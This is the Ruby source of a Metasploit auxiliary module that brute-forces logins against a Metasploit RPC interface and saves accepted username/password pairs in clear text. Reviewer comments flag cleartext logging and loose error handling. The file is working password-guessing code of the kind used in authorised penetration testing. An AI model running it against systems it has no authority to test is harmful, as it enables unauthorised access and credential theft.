Path: blob/master/modules/auxiliary/scanner/msf/msf_rpc_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner that tries username/password pairs against a Metasploit
# RPC interface and records every pair the service accepts.
#
# Handling notes for whoever runs or reviews this module:
# * Each candidate pair results in one @rpc.login call, so the target service
#   sees one authentication attempt per pair from the scanning host.
# * The attempt line and the success line both embed the password in clear
#   text, and accepted pairs are persisted through create_credential with
#   private_type :password. Console logs and the workspace database therefore
#   hold live credentials and need to be protected accordingly.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner

  # Registers module metadata and the datastore options used by the scanner.
  #
  # @param info [Hash] metadata passed through to update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Metasploit RPC Interface Login Utility',
      'Description' => %q{
        This module simply attempts to login to a
        Metasploit RPC interface using a specific
        user/pass.
      },
      'Author' => [ 'Vlatko Kosturjak <kost[at]linux.hr>' ],
      'License' => MSF_LICENSE
    ))

    # SSL defaults to true. Whether the RPC client validates the server
    # certificate is not visible in this file -- NOTE(review): confirm before
    # relying on the channel to protect the submitted passwords.
    scanner_options = [
      Opt::RPORT(55553),
      OptString.new('USERNAME', [true, "A specific username to authenticate as. Default is msf", "msf"]),
      OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]),
      OptBool.new('SSL', [ true, "Negotiate SSL for outgoing connections", true])
    ]
    register_options(scanner_options)

    # NOTE(review): the autofilter port (3790) differs from the RPORT default
    # (55553); presumably deliberate -- confirm.
    register_autofilter_ports([3790])
  end

  # Builds the RPC client for the current target, then runs do_login for every
  # pair yielded by each_user_pass.
  #
  # @param ip [String] target address handed in by the caller; the body reads
  #   rhost/rport rather than this argument
  # @return [void] returns early (nil) when the client cannot be created
  def run_host(ip)
    begin
      @rpc = Msf::RPC::Client.new(host: rhost, port: rport, ssl: ssl)
    rescue ::Interrupt
      # Let an operator interrupt propagate unchanged.
      raise
    rescue StandardError => e
      vprint_error("Cannot create RPC client : #{e}")
      return
    end

    each_user_pass { |user, pass| do_login(user, pass) }
  end

  # Stores an accepted username/password pair together with the service it
  # belongs to.
  #
  # @param opts [Hash] reads :ip, :port, :service_name, :user, :password and
  #   :proof (callers in this file do not set :proof, so it is stored as nil)
  # @return whatever create_credential_login returns
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    # The password is stored as-is (private_type :password), not hashed.
    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password,
      **service_data
    }

    login_data = {
      last_attempted_at: Time.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof],
      **service_data
    }

    create_credential_login(login_data)
  end

  # Attempts a single login and reports the pair when the service accepts it.
  #
  # The returned symbol goes back to the each_user_pass block; how each symbol
  # is interpreted is defined by the AuthBrute mixin, which is not shown here.
  #
  # @param user [String] username to try
  # @param pass [String] password to try
  # @return [Symbol, nil] :next_user on success, :abort when the connection is
  #   refused, :skip_pass on any other StandardError, nil when login returns a
  #   falsy value without raising
  def do_login(user = 'msf', pass = 'msf')
    vprint_status("Trying username:'#{user}' with password:'#{pass}'")

    begin
      return unless @rpc.login(user, pass)

      print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'")
      report_cred(
        ip: rhost,
        port: rport,
        service_name: 'msf-rpc',
        user: user,
        password: pass
      )
      :next_user
    rescue Rex::ConnectionRefused => e
      print_error("Connection refused : #{e}")
      :abort
    rescue StandardError
      # NOTE(review): every StandardError lands here, including ones raised by
      # print_good/report_cred after an accepted login, so a timeout or TLS
      # failure is indistinguishable from a rejected password in the output.
      vprint_status("#{peer} - Bad login")
      :skip_pass
    end
  ensure
    # Runs after every attempt, whatever the outcome above; the next attempt
    # presumably reconnects through the same client object -- confirm.
    @rpc.close
  end
end